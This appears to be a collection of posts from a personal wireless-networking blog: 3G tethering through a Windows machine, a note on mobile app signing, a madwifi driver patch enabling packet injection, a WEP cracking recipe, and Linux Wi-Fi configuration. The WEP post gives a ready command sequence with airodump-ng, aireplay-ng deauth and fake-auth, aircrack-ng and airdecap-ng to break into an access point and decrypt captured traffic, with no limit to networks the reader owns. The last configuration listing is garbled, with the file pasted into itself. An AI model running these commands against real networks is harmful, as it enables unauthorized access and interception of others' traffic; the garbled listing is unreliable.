1

Sharing 3G connection using 802.11 Access Point

-

Let’s assess the situation: You have a 3G phone which allows tethering, a windows machine, a wireless access point and another PC that is connected to the LAN port of the wireless access point (or typically called a wireless router). The wireless access point is a home network and your ISP decides to disconnect your signal or is experiencing some problems. How do you share your 3G connection, so that other computers can connect through the wireless AP and use your cell phone’s 3G connection? It’s actually quite simple.

Tether your smartphone (in this case let’s say blackberry). Blackberry tethering in Windows over AT&T is allowed using a software called AT&T Communication Manager. Install ACM, and connect your Windows machine using a mini-USB cable to your phone. Goto Start->Run->cmd.exe. Type ipconfig /all to see the IP address and the DNS servers IP addresses.

Now connect the WAN link of your Wireless access point to this Windows machine’s ethernet port. Setup a static IP for this Windows machine say 192.168.10.1 with a netmask of 255.255.255.0. Now go to Network connections (from Control Panel), right click on the Mobile connection representing your blackberry, click on Advanced. In the Internet Connection Sharing section, check the box that says “Allow other network users to connect through this computer’s Internet connection” and select “Local Area Connection” (this is the same connection you connected to the WAN port of the wireless AP). Click OK. You may have to disconnect and reconnect your ACM connection to allow the settings to take effect.

Now that this is done, connect to the administration interface of the wireless access point to the other PC that is connected to the LAN port (or through the wireless) to the access point. Go to the administration interface of the wireless AP, and set a static IP for the router in the same subnet as with the Windows box (the one you set with 192.168.10.1). Set the static IP on the AP to be say 192.168.10.2 (remember this has to be the same subnet), netmask as 255.255.255.0 and then the most important, the default gateway to 192.168.10.1 (the IP of the windows box on the ethernet card). To set the DNS server addresses, use the same addresses you found using ipconfig /all in the first step. Otherwise you could also use open DNS servers or any other DNS servers but it’ll be best to use the DNS servers pointing to the ones used by the tethered connection because you can rule out DNS issues if something isn’t working and it comes down to troubleshooting. Once on the router, the static is set, the gateway is set, the DNS is set, you should be able to connect from your wireless network to the internet through your 3G connection! 🙂
Happy internet sharing! 🙂
Here is a schematic diagram:

[tethering]                [static IP]    [static IP]   [internal IP]  [DHCP address]
                                   |         |                |           |
[ phone ] <==> [Windows machine]:eth0 <==> wan:[Wireless AP]:lan <==> [client]
0

Mobile Security

-

Seems like the pwn2own this time around is going to be putting up prizes of about $100,000+ for people who can find 0-days for a variety of platforms. Especially, the fact that about $60,000 are being devoted for 0-days on the mobile security platform including the android platform etc., indicates a new era of security bugs.
The iPhone (non-jailbroken ones) as well as the BlackBerry application do tend to use signed executables. One only hopes that like the trust-relationships of the SSL-based certificates, the trust is really kept by analyzing the blackberry and iPhone apps.
Tyler Shields from Veracode presented his work of TXSBBSpy (source code URL: http://www.veracode.com/images/txsBBSpy.java; Presentation slides: http://www.veracode.com/images/TylerShields-MonkeyBerries-ShmooCon-2010.pdf).  In this he suggested that when controlled APIs are used the code needs to be signed by RIM but to do that RIM only gets the hash and not the source code.  This presents an interesting situation where RIM could actually be signing something that they don’t really know what it seems to be doing.

0

Atheros Madwifi-ng patch Revision 3876

-

Copy paste the text shown below into a file called madwifing-r3876.patch.


--- madwifi/ath/if_ath.c 2008-11-07 01:05:07.000000000 -0500
+++ madwifi-patched/ath/if_ath.c 2008-11-06 17:56:59.000000000 -0500
@@ -3000,6 +3000,7 @@
ath_tx_startraw(struct net_device *dev, struct ath_buf *bf, struct sk_buff *skb)
{
struct ath_softc *sc = dev->priv;
+ struct ieee80211com *ic = &sc->sc_ic;
struct ath_hal *ah = sc->sc_ah;
struct ieee80211_phy_params *ph = &(SKB_CB(skb)->phy);
const HAL_RATE_TABLE *rt;
@@ -3012,7 +3013,8 @@
struct ieee80211_frame *wh;

wh = (struct ieee80211_frame *)skb->data;
- try0 = ph->try[0];
+ //try0 = ph->try[0];
+ try0 = (ic->ic_opmode == IEEE80211_M_MONITOR) ? 1 : ph->try[0];
rt = sc->sc_currates;
txrate = dot11_to_ratecode(sc, rt, ph->rate[0]);
power = ph->power > 60 ? 60 : ph->power;
@@ -3036,7 +3038,8 @@
rt = sc->sc_currates;
KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode));

- if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+ //if (IEEE80211_IS_MULTICAST(wh->i_addr1)) {
+ if (IEEE80211_IS_MULTICAST(wh->i_addr1) || ((ic->ic_opmode == IEEE80211_M_MONITOR) && (skb->data[1]&3) != 0x01) ) {
flags |= HAL_TXDESC_NOACK; /* no ack on broad/multicast */
sc->sc_stats.ast_tx_noack++;
try0 = 1;

Check out the madwifi driver as follows:


sudo ifconfig ath0 down
sudo ifconfig wifi0 down
svn -r 3876 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng
cd madwifi-ng
patch -Np1 -i ../madwifing-r3876.patch
sudo ./scripts/madwifi-unload
make
sudo make install
sudo depmod -ae
sudo modprobe ath_pci

These instructions are similar to the ones written here (for a different revision):
http://www.aircrack-ng.org/doku.php?id=madwifi-ng

1

WEP Cracking

-

If you want to crack WEP keys of an AP that is using WEP.

The following steps should be performed:

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>

Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap

0

WPA2+TKIP on Kubuntu with IPW3945

-

So I decided to use WPA2 Personal with AES+TKIP on my new Linksys WRT54GL router after my old D-Link router died. However, there were some issues in getting it to work on Kubuntu 6.10 Edgy Eft with my Intel Wireless IPW3945abg.
So I decided to put my /etc/network/interfaces and the /etc/wpa_supplicant.conf files up here for reference:
Suppose BLAH is my ESSID name. The psk value is an altered value for elucidation purposes only:

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
ap_scan=2
fast_reauth=1

# WPA-PSK
network={
ssid="BLAH"
proto=WPA RSN
key_mgmt=WPA-PSK
pairwise=TKIP
group=TKIP
psk=aaaa3fa7bbbbccccf6d44e199ecb2bebccccad25a0778beeee104db0b3fffff7
}

The value of the PSK command was obtained by using the value associated with the prefix “psk=…” after issuing the following command:

# wpa_passphrase BLAH passphrase
network={
ssid="BLAH"
#psk="passphrase"
psk=aaaa3fa7bbbbccccf6d44e199ecb2bebccccad25a0778beeee104db0b3fffff7
}

The /etc/network/interfaces looked like this:

auto lo
iface lo inet loopback

auto eth1
iface eth1 inet dhcp
wpa-conf managed
wpa-driver wext
wpa-ssid BLAH
wpa-ap-scan 2
wpa-proto RSN
wpa-pairwise TKIP
wpa-group TKIP
wpa-key-mgmt WPA-PSK
wpa-psk aaaa3fa7bbbbccccf6d44e199ecb2bebccccad25a0778beeee104db0b3fffff7
pre-up wpa_supplicant -Bw -Dwext -i eth1 -c/etc/wpa_supplicant.conf
post-down killall -q wpa_supplicant

Once I was done with this configuration all I had to do was, issue the following command to get wireless working with WPA2 and TKIP:

# /etc/init.d/networking restart
0

Inspiron 700m Wireless configuration on Kubuntu

-

I have a Dell Inspiron 700m. I have Kubuntu Breezy Badger 5.10 on this box.
This is how I got the WiFi going on this beauty.
1. Boot up into windows and get the Intel Driver from Intels 1st site OR Intels 2nd site

2. Save the files into a location on the drive which is accessible through linux.


root@trance:/home/trance# ls -al /media/hda1/intel/wireless_9.0.4_generic_109116/Drivers/
total 8680
dr-x—— 1 root root 4096 2006-05-14 05:42 .
dr-x—— 1 root root 4096 2006-05-14 05:42 ..
-r——– 1 root root 188416 2005-12-27 23:53 SetupWLD.EXE
-r——– 1 root root 4849 2005-01-25 15:17 SetupWLD.ini
-r——– 1 root root 13 2006-02-02 12:38 verfile.tic
-r——– 1 root root 1671168 2006-01-27 08:50 W29MLRES.DLL
-r——– 1 root root 2956544 2006-01-17 21:34 w29n50.sys
-r——– 1 root root 14821 2006-02-02 00:47 w29n51.cat
-r——– 1 root root 119785 2006-01-18 15:47 w29n51.INF
-r——– 1 root root 3325312 2006-01-17 21:32 w29n51.sys
-r——– 1 root root 466944 2006-01-27 08:49 W29NCPA.DLL
-r——– 1 root root 122880 2005-12-27 23:53 WLDMLRES.DLL
root@trance:/home/trance#


3. Go back into Kubuntu and get the ndiwrapper-utils, ndisgtk, ndiswrapper-source using


root@trance:/home/trance# sudo apt-get install ndiswrapper ndisgtk ndiswrapper-source


4. As root ndiswrapper -i will use the windows inf file to install the wireless driver. ndiswrapper -l lists the driver installed.
example:


root@trance:/home/trance# ndiswrapper -i /media/hda1/intel/wireless_9.0.4_generic_109116/Drivers/w29n51.INF
root@trance:/home/trance# ndiswrapper -l
Installed ndis drivers:
w29n51 driver present, hardware present
root@trance:/home/trance#


5. modprobe ndiswrapper checks if the ndiswrapper kernel module is installed. An installed module will result in no error. Then write the config file such that you do not need to go through the earlier steps every time you restart the system.


root@trance:/home/trance# modprobe ndiswrapper
root@trance:/home/trance# ndiswrapper -m
Adding “alias wlan0 ndiswrapper” to /etc/modprobe.d/ndiswrapper


6. If some error occurs check the output of lsmod


root@trance:/home/trance# lsmod | grep ndiswrapper


7. Now that your ndiswrapper is installed and configured. We now need to start up the wireless interface. On my box the wireless interface used to show up as eth0, however, it was not configured to use the ndiswrapper so I would get ‘segmentation fault’ on doing ifup eth0.
However, with the drivers set, I checked if all was well.


root@trance:/home/trance# iwconfig
lo no wireless extensions.

eth1 no wireless extensions.

eth0 IEEE 802.11g ESSID:”MySSID”
Mode:Managed Frequency:2.437 GHz Access Point: 00:13:46:46:78:28
Bit Rate=54 Mb/s Tx-Power=20 dBm
Retry limit:7 RTS thr:off Fragment thr:off
Encryption key:XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-XX Security mode:open
Power Management:off
Link Quality=97/100 Signal level=-27 dBm Noise level=-89 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

sit0 no wireless extensions.
root@trance:/home/trance# ifconfig
eth0 Link encap:Ethernet HWaddr 00:13:CE:D9:0D:74
inet6 addr: fe80::213:ceff:fed9:d74/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:48 errors:0 dropped:0 overruns:0 frame:0
TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:236683 (231.1 KiB) TX bytes:1104 (1.0 KiB)
Interrupt:10 Base address:0x8000 Memory:e0206000-e0206fff

eth1 Link encap:Ethernet HWaddr 00:12:3F:6B:36:2F
inet addr:192.168.0.109 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::212:3fff:fe6b:362f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3050 errors:0 dropped:0 overruns:0 frame:0
TX packets:1534 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3117901 (2.9 MiB) TX bytes:159050 (155.3 KiB)
Interrupt:10

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:33 errors:0 dropped:0 overruns:0 frame:0
TX packets:33 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2058 (2.0 KiB) TX bytes:2058 (2.0 KiB)

root@trance:/home/trance# ifup eth0
There is already a pid file /var/run/dhclient.eth0.pid with pid 0
Internet Systems Consortium DHCP Client V3.0.2
Copyright 2004 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/products/DHCP

sit0: unknown hardware address type 776
sit0: unknown hardware address type 776
Listening on LPF/eth0/00:13:ce:d9:0d:74
Sending on LPF/eth0/00:13:ce:d9:0d:74
Sending on Socket/fallback
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3
ip length 328 disagrees with bytes received 332.
accepting packet with data after udp payload.
DHCPOFFER from 192.168.0.1
DHCPREQUEST on eth0 to 255.255.255.255 port 67
ip length 328 disagrees with bytes received 332.
accepting packet with data after udp payload.
DHCPACK from 192.168.0.1
bound to 192.168.0.101 — renewal in 241302 seconds.
root@trance:/home/trance# ifdown eth1
There is already a pid file /var/run/dhclient.eth1.pid with pid 6390
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.0.2
Copyright 2004 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/products/DHCP

sit0: unknown hardware address type 776
sit0: unknown hardware address type 776
Listening on LPF/eth1/00:12:3f:6b:36:2f
Sending on LPF/eth1/00:12:3f:6b:36:2f
Sending on Socket/fallback
DHCPRELEASE on eth1 to 192.168.0.1 port 67
root@trance:/home/trance# ping www.google.com
PING www.l.google.com (64.233.161.99) 56(84) bytes of data.
64 bytes from 64.233.161.99: icmp_seq=1 ttl=233 time=73.5 ms
64 bytes from 64.233.161.99: icmp_seq=2 ttl=233 time=51.6 ms

— www.l.google.com ping statistics —
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 51.688/62.634/73.580/10.946 ms


8. To make sure that you don’t have to type iwconfig essid key every time you log on. Change you /etc/network/interfaces file to have these few lines at the end of the file. wireless essid is your wireless network name (SSID) and the key is the WEP key.

iface eth0 inet dhcp
wireless-essid XXXXXXX
wireless-key XXXXXXXXXXXXXXXXX

My /etc/network/interfaces of Ubuntu (in FC/RHL this is the counterpart of the /etc/sysconfig/network-scripts/ifcfg-ethX)
looks like:


# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# This is a list of hotpluggable network interfaces.
# They will be activated automatically by the hotplug subsystem.
mapping hotplug
script grep
map eth1

# The primary network interface
auto eth1
iface eth1 inet dhcp

auto eth0
allow-hotplug eth0
iface eth0 inet dhcp
wireless-essid USC-Trojans
wireless-key # This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# This is a list of hotpluggable network interfaces.
# They will be activated automatically by the hotplug subsystem.
mapping hotplug
script grep
map eth1

# The primary network interface
auto eth1
iface eth1 inet dhcp

auto eth0
allow-hotplug eth0
iface eth0 inet dhcp
wireless-essid USC-Trojans
wireless-key 11111111111111111111111111